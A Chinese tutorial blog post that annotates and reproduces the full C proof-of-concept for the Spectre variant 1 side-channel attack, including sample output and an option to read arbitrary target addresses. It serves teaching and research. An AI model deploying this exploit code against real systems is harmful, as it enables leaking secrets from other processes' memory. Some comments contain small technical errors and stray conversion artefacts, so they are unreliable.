intel：spectre&Meltdown側信道攻擊（二）

時間 2020-08-01

標籤 intel spectre&meltdown spectre meltdown 信道攻擊欄目 Intel 简体版

原文原文鏈接

　　上面一篇介紹了spectre&meltdown基本原理和簡單的demo方案，今天繼續學習一下該漏洞發現團隊原始的POC：https://spectreattack.com/spectre.pdf html

　　一、先展現一下運行結果，便於有個直觀的認識：從打印的結果來看，成功猜想出了secret字符串的內容；數組

　　二、下面詳細解讀代碼緩存

（1）整個漏洞利用核心的兩個函數：rdtscp和clflush都在這兩個頭文件裏申明瞭；ide

#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

　　（2）array1：attacker用來訪問victim的數組。這裏申明瞭160字節，但後續會用很大的數跨越數組定義時的邊界限制，達到訪問victim內存的目的；函數

unuesed1和unused2：多核cpu，每一個核都有各自的L1和L2緩存；緩存以line做爲基本的單元，每一個cache line有64字節；unuesed1和unuesed2恰好填滿2個cache line，array1佔用3個cache line；oop

這3個數組一共佔用5個不一樣的cache line；學習

　　　　 array2：secret每一個單位是1byte，大小不超過255，因此「橫座標」最大256；每一個cache line是64byte(最小緩存單元)，也就是512bit，因此「縱座標」是512；測試

uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array2[256 * 512];//（1）secret每一個單位1字節，數字大小不超過255；（2）L1的單個cache line大小64K = 512bit,這裏可存儲256個不一樣的cache line （3）shared with the attacker and victim

　　（3）這個是victim的數據，也就是須要爆破的數據；優化

char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

　　（4）經過array1申明的長度是160，但後面某些時候會傳入遠大於160的數，越界訪問secret的內容後存入緩存。後面即便if條件不成立，cpu回退寄存器的狀態，可是的緩存仍然還在；ui

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
void victim_function(size_t x)
{
    if (x < array1_size)//array1_size不在緩存，須要從內存讀，很耗時，cpu先行執行下面的語句
    {
        temp &= array2[array1[x] * 512];//array1長度是160，但x能夠遠超160，好比main裏面定義malicious_x，這樣就進入secret的存儲空間
    }
}

　　（5）判斷cache是否命中的閾值，這個值是屢次實驗獲得的，不是理論推導出來的；

#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold：80是屢次實驗測試獲得的，不是某些理論推導出來的 */

　　（6）保存緩存是否命中結果

for (i = 0; i < 256; i++)
        results[i] = 0;

　　（7）array2每一個元素若是已經在cpu的緩存，所有清除，避免影響後續計時；

for (i = 0; i < 256; i++)//每一個元素的緩存都清零
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

　　（8）把array1_size從cpu緩存去除；緊接着的這個空轉爲了確保array1_size的從cpu緩存清除；

 _mm_clflush(&array1_size);//array1_size從緩存去除
 for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it；volatile強制cpu從內存讀取Z的值，不然這個空轉可能被編譯器優化
 {/* Delay (can also mfence),也能夠用 mfence 替代*/
 }

　　（9）這裏計算array1的偏移座標，方法很複雜，單看代碼很難理解爲啥這麼作，不妨先打印一些結果數據看看：

x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));

　　  構造的x以下：頗有規律，每6次一個輪迴；每一個輪迴前5次的x都是7，在arry1_size的範圍內，if條件是成立的；最後一個遠大於arry1_size，致使if條件失效；但CPU有分支預測功能，會根據該
if分支附近或前面幾個分支預測下一個if分支是否成立。前面5個分支都是成立的，會「誘導」cpu認爲第6次if也成立，進而提早執行temp &= array2[array1[x] * 512]的代碼，把victim的內存讀到cpu
內部緩存； 而後就是執行victim_funtion（）；

j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224

　　（10）victim_function執行完後，從新從array2讀數據，並計時；耗時最短的說明在victim中存的就是這個；

/* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++)
        {    
            mix_i = ((i * 167) + 13) & 255;//一、打亂讀取byte的順序，避免cpu猜想和優化byte的讀取  二、&255=&FF，只保留低8bit，效果至關於%255（小於255）或%255-1（大於255）
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

　　（11）接下來就是排序，找出耗時最短的2個數字；

/* Locate highest & second-highest results results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++)
        {
            if (j < 0 || results[i] >= results[j])
            {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k])
            {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];

　　（12）繼續看main：這個就是從arry1到目標內存的offset：

size_t malicious_x = (size_t)(secret - (char*)array1);

　　　　緊接着會傳入readMemoryByte函數去探測讀取內容：

printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);

　　（13）和http://www.javashuo.com/article/p-myuqazmn-nc.html 這個POC比，這個demo多了兩個功能：

　訓（誘）練（導）cpu的分支預測結果，讓其認爲下一個if條件是成立的，提早執行if分支
不單單能探測secret內容，還能讓用戶指定須要探測的目標地址和探測的數據長度，以下：

    if (argc == 3)//第一個參數是目標地址，第二個參數是讀取的字節數；
    {
        sscanf_s(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert input value into a pointer；*/
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }

完整的代碼以下（精華都在註釋了）：

#include <stdio.h> 
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/* sscanf_s only works in MSVC. sscanf should work with other compilers */
#ifndef _MSC_VER
#define sscanf_s sscanf
#endif

/********************************************************************
Victim code.
********************************************************************/;
unsigned int array1_size = 16;
uint8_t unused1[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };//a shared memory space between the victim and the attacker
uint8_t unused2[64];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
uint8_t array2[256 * 512];//（1）secret每一個單位1字節，數字大小不超過255；（2）L3的單個cache line大小64K = 512bit,這裏可存儲256個不一樣的cache line （3）shared with the attacker and victim

char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

uint8_t temp = 0; /* ensure the compiler does not remove the victim_function() at compilation time*/
// In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
void victim_function(size_t x)
{
    if (x < array1_size)//array1_size不在緩存，須要從內存讀，很耗時，cpu先行執行下面的語句
    {
        temp &= array2[array1[x] * 512];//array1長度是160，但x能夠遠超160，好比main裏面定義malicious_x，這樣就進入secret的存儲空間
    }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold：80是屢次實驗測試獲得的，不是某些理論推導出來的 */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
{
    static int results[256];//內存單元讀取的時間
    int tries, i, j, k, mix_i;
    unsigned int junk = 0;
    size_t training_x, x;
    register uint64_t time1, time2;
    volatile uint8_t* addr;

    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--)
    {
        /* Flush array2[256*(0..255)] from cache */
        for (i = 0; i < 256; i++)//每一個元素的緩存都清零
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;//training_x = 0~15
        for (j = 29; j >= 0; j--)
        {
            _mm_clflush(&array1_size);//array1_size從緩存去除
            for (volatile int z = 0; z < 100; z++)//ensure the flush is done, and the processor does not re-order it；volatile強制cpu從內存讀取Z的值，不然這個空轉可能被編譯器優化
            {/* Delay (can also mfence),也能夠用 mfence 替代*/
            } 
            /*每循環6次，其中5次產生較小的x，讓if條件成立；第6次產生超大、讓if不成立的x，但因爲前5次的x都成立，cpu仍是會預先執行if分支。前面5次小x就是用來訓練cpu分支預測的，以達到第6次「欺騙」的目的*/
            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x);//x是相對arry1的偏移，能夠深刻secret數組探查；
        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++)
        {    
            mix_i = ((i * 167) + 13) & 255;//一、打亂讀取byte的順序，避免cpu猜想和優化byte的讀取  二、&255=&FF，只保留低8bit，效果至關於%255（小於255）或%255-1（大於255）
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk); /* READ TIMER */
            junk = *addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++)
        {
            if (j < 0 || results[i] >= results[j])
            {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k])
            {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];
}

int main(int argc, const char** argv)
{
    printf("Putting '%s' in memory, address %p\n", secret, (void*)(secret));
    size_t malicious_x = (size_t)(secret - (char*)array1); /* default for malicious_x，array1到secret的距離，包括array2[256 * 512]、unused2[64]、array1[160] */
    int score[2], len = strlen(secret);
    uint8_t value[2];

    for (size_t i = 0; i < sizeof(array2); i++)//array2[256 * 512]
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    if (argc == 3)//第一個參數是目標地址，第二個參數是讀取的字節數；
    {
        sscanf_s(argv[1], "%p", (void**)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert input value into a pointer；*/
        sscanf_s(argv[2], "%d", &len);
        printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0)
    {
        printf("Reading at malicious_x = %p... ", (void*)malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        printf("0x%02X='%c' score=%d ", value[0],
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X='%c' score=%d)", value[1],
                (value[1] > 31 && value[1] < 127 ? value[1] : '?'),
                score[1]);
        printf("\n");
    }
#ifdef _MSC_VER
    printf("Press ENTER to exit\n");
    getchar();    /* Pause Windows console */
#endif
    return (0);
}

參考：https://www.fortinet.com/blog/threat-research/into-the-implementation-of-spectre 代碼解讀

https://bbs.pediy.com/thread-254288.htm https://xz.aliyun.com/t/6332 跨進程泄露敏感信息

https://bbs.pediy.com/thread-256190.htm Intel處理器L3 Cache側信道分析研究

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。